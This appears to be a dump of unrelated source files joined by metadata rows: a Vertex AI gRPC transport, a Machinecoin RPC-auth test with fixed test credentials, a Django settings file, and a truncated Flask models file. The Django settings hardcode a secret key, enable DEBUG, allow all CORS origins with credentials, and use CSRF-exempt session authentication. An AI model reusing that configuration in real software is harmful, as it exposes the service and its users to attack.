#====================;=iYVVRXYYIIttiiiiiitYYttItiitYYYIIIYVYIIIYYYYVXItttitttttttttttttttttttttttttttttti+============
#===================;;=itYVRXVYYIIttiiiiiIYYYYVYIIIYYYIIYYVVVYYYYYYVXItttittttttttttttttttttttttttttttttti+==+========
#====================;=itIVRRVVYIIItttttIYYYYYYYIIttIIIIYVVXVVYYYVVXXItttitttttttttttttttttttttttttttttttti+==========
#=====================+ttIYBRXVYYYIIItttIVYYYIItiiiitItIIYVVVVYYVYVRVIttttttttttttttttttttttttttttttttttttti+=========
#===================+iitttYBBXXVYYYIIIIIVVYYIIItiiiitYYYVVVVVYYYVYVRVItttttttttttttttttttttttttttttttttttttti+===+====
#=================+iiiitttYRBRXVVVYYYIYYXVVYIIIIItIIIItYXVXXVYYYYYXRYIttttttttttttttttttttttttttttttttttttttti+=======
#==============+++itiiitttIXRRXXXVYYYYYYXVVYVVYIIti=;=iYVtVVVYYYYVRRIIItttitttttttttttttttttttttttttttttttttttt++==+==
#=============+iitttiiitttIYRRRXXVVYYYYYVVXXXVt+=;=;+tttYtYVVYYYVVRRIIIttttttttttttttttttttttttttttttttttttttttti+=+==
#==========++iittttttiittIIYXRRRXXVYYYYYYVXXYVIttitttiitItYYVYYVVXRRIIIttttttttttttttttttttttttttttttttttttttIItti+===
#=========+iitttttttttttttIYVXRRRXVYYYYYYYXVttYiiiiiiiiIIIIYVVVVVRRRIIItttttttttttttttttttttttttttttttttttttttIIIti===
#======+++iiitttttttttttttIYYVRBRRXVVVYYIYVVItYti++iiitItIIYVVVVXRRRYIItttttttttttttttttttttttttttttttttttttttIIIIti==
#++===++iiitttttttttttttttIYYVXRRRRXVYYYYYVYIttItiititIItIYVVVVXXRRRIIItttttttttttttttttttttttttttttttttttttttIIIIIt+=
#===++iittttttttttttttttttIIYYVRBRRXXVVYYYVVYIitYIIIIYVYIIYVVVXXRXRRIIIttttttttttttttttttttttttttttttttttttttttIIIIIt=
#=++iittttttttttttttttttttIIYYYXBRRRXXVVYYVVVIttYYIIIYYIIIYVVVXRRXRRIItttItttttttttttttttttttttttttttttttttttttIIIIII=
#+iiitttttttttttttttttttttIIIYYYRRRRRXVVVYVVVYIttIIIYIttIYYVVXXRRXBXIIttIItttttttttttttttttttttttttttttttttttttIIIIII+
#ittitttttttttttttttttttttIIIYYYVRRRRRXXXVVVVVVItttiiitIYYVYVXXRRXBXIIttIttttttttttttttttttttttttttttttttIttttttIIIIIi
#ttttttttttttttttttttttttttIIIIYYXRXBBXXXXVYVXXVIItttIIYVVVYXRRRRXMXIItttttttttttttttttttttttttttttttttttIttttttIIIIIt
#ttttitttttttttttItttttttttIIYIIIYXXXRBRXXXVVVXXVVYYVXXVVYIVRRRXXRMVItttttttttttttttttttttttttttttttttttIIItttIttIIIIt
#tttttttttttttttttttttttIItIIIYIIIVRVXRRRXRXXVYVXXXXXVVYYIYXRRXVVBWVttttttttttttttttttttttttttttttttttttIIIttttttIIIIt
#ttttttttttttttItttIIttttIttIIIIIIIVXVYRRRRRRVYIYYYYIIIIIIVRBXVVYBWYtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#ttttttttttttttIIIItIItttIttIIIIIIIYVRXYXBRXRRXYIIIttIttIVRBXVYYYBWVtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#tIttttttttttIIIIIIIIItttItttIIIIIIYYXXXYVRRRRRXYIYIIIYYVRRXYYYIIMWXttttttttttttttttttttttttttttttttttttIIIItttIIIIIII
#ttttttttttttIIIIIIIIItttIIttIIIIIIYIXXXXVVXRRRBXVYYYYYXRRVYIIIIIBRYttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttttIIIIIIIIIIIItttIItttIIIIIIIYRVXXXVVXRRBBRRRRRRVItIIttIIVItttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttIIIIIIIIIIIIIItttIIIttIIIIIIIIVBVVVVVVYVXXXXVVYIttttttIItttttttttttttttttIttttttttttttttttttttttIIIIItIIIIIIIt
#tttIttttttIIIIIIIIIttttIIIItttIIIIIIIIRMYIYYYYYIIttttitttttttItttttttttttttttIIItttttttttttttttttttttttIItIIIIIIIIIIt
#tttIIIIIIIIIIIIIIIIIttttIIIIttIIIIYIIIYBMYttIIIItttttttttttttttttttttttttttttttttttttttttttttttttttttttIItIIIIIIIIIIt
#IIIIIIIIIIIIIIIIIIIIIttttIIItttIIIIIIIIVMMYittttttttitttttttIttttItttIIItttttttttttttttttttttttttttttttIIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIIItttIIIItttIIIIIIYtXWMYitiiiiiiiitttttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIItIIttIIIIttIIIIIIIIIRWRIttiiiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIttttttttttttIIttIIIttIIIIIIIIIIVYIItttiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIttIIItIIIIIIIIIIIIIttIIIIIIIIIIttIIIItitiittttIIttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttttIItIIIttttttItttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIYYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttIItIIIItIttttIItttttttIIttttttttttttttttttttttttttttttttttttIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItItttttIIIIttttIIIItttIYIttIIIIIIIItIttttttIItttttttttttttttttttttttttttttttttttttIIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItttttttIIIItttttIIItIIIIYIttIttttIIIItttttIIttttttttttttttttttttttttttttttttttttttIIIIIIYYYIIYYI
| gpl-2.0 | -1,536,256,754,729,362,000 | 70.308108 | 352 | 0.673817 | false |
googleapis/googleapis-gen | google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform_v1/services/migration_service/transports/grpc_asyncio.py | 1 | 14287 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.aiplatform_v1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
from .base import MigrationServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import MigrationServiceGrpcTransport
class MigrationServiceGrpcAsyncIOTransport(MigrationServiceTransport):
"""gRPC AsyncIO backend transport for MigrationService.
A service that migrates resources from automl.googleapis.com,
datalabeling.googleapis.com and ml.googleapis.com to Vertex AI.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def search_migratable_resources(self) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Awaitable[migration_service.SearchMigratableResourcesResponse]]:
r"""Return a callable for the search migratable resources method over gRPC.
Searches all of the resources in
automl.googleapis.com, datalabeling.googleapis.com and
ml.googleapis.com that can be migrated to Vertex AI's
given location.
Returns:
Callable[[~.SearchMigratableResourcesRequest],
Awaitable[~.SearchMigratableResourcesResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'search_migratable_resources' not in self._stubs:
self._stubs['search_migratable_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/SearchMigratableResources',
request_serializer=migration_service.SearchMigratableResourcesRequest.serialize,
response_deserializer=migration_service.SearchMigratableResourcesResponse.deserialize,
)
return self._stubs['search_migratable_resources']
@property
def batch_migrate_resources(self) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the batch migrate resources method over gRPC.
Batch migrates resources from ml.googleapis.com,
automl.googleapis.com, and datalabeling.googleapis.com
to Vertex AI.
Returns:
Callable[[~.BatchMigrateResourcesRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'batch_migrate_resources' not in self._stubs:
self._stubs['batch_migrate_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/BatchMigrateResources',
request_serializer=migration_service.BatchMigrateResourcesRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['batch_migrate_resources']
__all__ = (
'MigrationServiceGrpcAsyncIOTransport',
)
| apache-2.0 | -6,148,530,257,652,525,000 | 45.537459 | 102 | 0.623084 | false |
machinecoin-project/machinecoin | test/functional/rpc_users.py | 2 | 7912 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Machinecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiple RPC users."""
from test_framework.test_framework import MachinecoinTestFramework
from test_framework.util import (
assert_equal,
get_datadir_path,
str_to_b64str,
)
import os
import http.client
import urllib.parse
import subprocess
from random import SystemRandom
import string
import configparser
import sys
class HTTPBasicsTest(MachinecoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_chain(self):
super().setup_chain()
#Append rpcauth to machinecoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
rpcuser = "rpcuser=rpcuser💻"
rpcpassword = "rpcpassword=rpcpassword🔑"
self.user = ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(10))
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
gen_rpcauth = config['environment']['RPCAUTH']
p = subprocess.Popen([sys.executable, gen_rpcauth, self.user], stdout=subprocess.PIPE, universal_newlines=True)
lines = p.stdout.read().splitlines()
rpcauth3 = lines[1]
self.password = lines[3]
with open(os.path.join(get_datadir_path(self.options.tmpdir, 0), "machinecoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
f.write(rpcauth3+"\n")
with open(os.path.join(get_datadir_path(self.options.tmpdir, 1), "machinecoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcuser+"\n")
f.write(rpcpassword+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcauth tool
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
authpairnew = "rt:"+password
self.log.info('Correct...')
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Use new authpair to confirm both work
self.log.info('Correct...')
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rt's password
self.log.info('Wrong...')
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rt
self.log.info('Wrong...')
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Correct for rt2
self.log.info('Correct...')
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong password for rt2
self.log.info('Wrong...')
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Correct for randomly generated user
self.log.info('Correct...')
authpairnew = self.user+":"+self.password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong password for randomly generated user
self.log.info('Wrong...')
authpairnew = self.user+":"+self.password+"Wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
###############################################################
# Check correctness of the rpcuser/rpcpassword config options #
###############################################################
url = urllib.parse.urlparse(self.nodes[1].url)
# rpcuser and rpcpassword authpair
self.log.info('Correct...')
rpcuserauthpair = "rpcuser💻:rpcpassword🔑"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rpcuser's password
rpcuserauthpair = "rpcuserwrong:rpcpassword"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rpcuser
self.log.info('Wrong...')
rpcuserauthpair = "rpcuser:rpcpasswordwrong"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| mit | 8,029,643,323,245,686,000 | 37.339806 | 129 | 0.607369 | false |
mhefley/hackart | hackart/settings.py | 1 | 4632 | """
Django settings for hackart project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7$x4x@#=w^_@d*yep49wfla2)lvu^!g)&+ea76n2xjkqyno(n#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['gitlab.nullify.online']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#App specific
'rest_framework',
'api',
'corsheaders'
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
#'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
'rest_framework.permissions.IsAuthenticated'
],
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': [
'api.rest_framework_config.CsrfExemptSessionAuthentication',
'rest_framework.authentication.SessionAuthentication'
],
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
ROOT_URLCONF = 'hackart.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hackart.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| mit | -2,741,053,265,845,104,000 | 27.316456 | 91 | 0.668826 | false |
Blackyukun/Simpleblog | app/models.py | 1 | 15497 | import datetime
from flask_login import UserMixin, AnonymousUserMixin
from flask import current_app, request, url_for
from hashlib import md5
from werkzeug.security import generate_password_hash, check_password_hash
from markdown import markdown
import bleach
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from app.exceptions import ValidationError
from app import db, lm, whooshee
"""
generate_password_hash(password, method=pbkdf2:sha1, salt_length=8):这个函数将原始密码作为输入,
以字符串形式输出密码的散列值,输出的值可保存在用户数据库中,
method和salt_length的默认值就能满足大多数需求。
check_password_hash(hash, password):这个函数的参数是从数据库中取回的密码散列值和用户输入的密码。
返回值为True表明密码正确。
flask_login的UserMixin类,实现了用户方法:
is_authenticated:如果用户已经登录,必须返回True,否则返回False
is_active:如果允许用户登录,必须返回True,否则返回False。如果要禁用账户,可以返回False
is_anonymous:对普通用户必须返回False
fet_id():必须返回用户的唯一标识符,使用Unicode编码字符串
实现了关注和被关注的多对多数据模型,followed和followers关系都定义为单独的一对多关系。
必须使用可选参数foreign_keys指定的外键,用来消除外键简的歧义。
db.backref()参数并非指定这两个关系之间的引用关系,而是回引Follow模型。回引的lazy参数为joined。
cascade参数的值是一组由逗号分隔的层叠选项,all表示除了dalete-orphan之外的所有层叠选项。
意思是启用所有默认层叠选项,而且还要删除孤记录。
is_following()方法和is_followed_by()方法分别在左右两边的一对多关系中搜索指定用户,如果找到就返回True
获取关注用户的文章:
db.session.query(Post)指明这个查询要返回Post对象
select_from(Follow)的意思是这个查询从Follow模型开始
filter_by(follower_id=self.id)使用关注用户过滤follows表
join(Post, Follow.followed_id==Post.author_id)联结filter_by()得到的结果和Post对象
角色模型的permissions字段的值是一个整数,表示位标志。各操作都对应一个位位置,能执行某项操作的角色,其位会被设为1
程序权限:
关注用户:0x01
发表评论:0x02
发表文章或提问:0x04
管理他人评论:0x08
管理员:0x80
用户角色:
游客:0x00 未登录的用户,只有阅读权限
用户:0x07 具有发布文章,提问,评论和关注用户的权限,默认角色
小管家:0x0f 审查不当评论的权限
管理员:0xff 有所有权限,包括修改用户角色权限
创建数据库后,需要创建用户角色,先更新数据库,然后:
使用python manage.py shell
>>> Role.insert_roles()
>>> Role.query.all()
Comment模型和Post模型的属性一样,但是多了个disabled字段。这是个布尔值字段,作者可以通过这个字段查禁不当评论。
Post模型也添加disabled字段。
会话模型中,lazy='joined'指明加载记录,使用联结,primaryjoin明确指定两个模型之间使用的联结条件。
为了消除外键之间的歧义,定义关系时必须使用可选参数 foreign_keys 指定的外键。
cascade 参数的值是一组有逗号分隔的层叠选项,all 表示除了 delete-orphan 之外的所有层叠选项。
all,delete-orphan 的意思是启用所有默认层叠选项,而且还要删除孤儿记录。
在User模型上添加基于令牌的认证方法:
generate_auth_token()方法使用编码后的用户id字段值生成一个签名令牌,指定了以秒为单位的过期时间。
verify_auth_token()方法接收的参数是一个令牌,如果令牌可用就返回对应的用户。
"""
# 关注关联表
class Follow(db.Model):
__tablename__ = 'follows'
follower_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
followed_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
unread = db.Column(db.Boolean, default=True)
timestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow)
# messages = db.relationship('Message', backref='follow', uselist=False)
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
# 关联
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
posts = db.relationship('Post', backref='author', lazy='dynamic')
# post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
likes = db.relationship('Like', backref='user', lazy='dynamic')
comments = db.relationship('Comment', backref='author', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='author', lazy='dynamic')
# 个人资料
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime)
# 关注,被关注
followed = db.relationship('Follow',
foreign_keys = [Follow.follower_id],
backref = db.backref('follower', lazy='joined'),
lazy = 'dynamic',
cascade = 'all, delete-orphan')
followers = db.relationship('Follow',
foreign_keys=[Follow.followed_id],
backref=db.backref('followed', lazy='joined'),
lazy='dynamic',
cascade='all, delete-orphan')
def __init__(self, **kwargs):
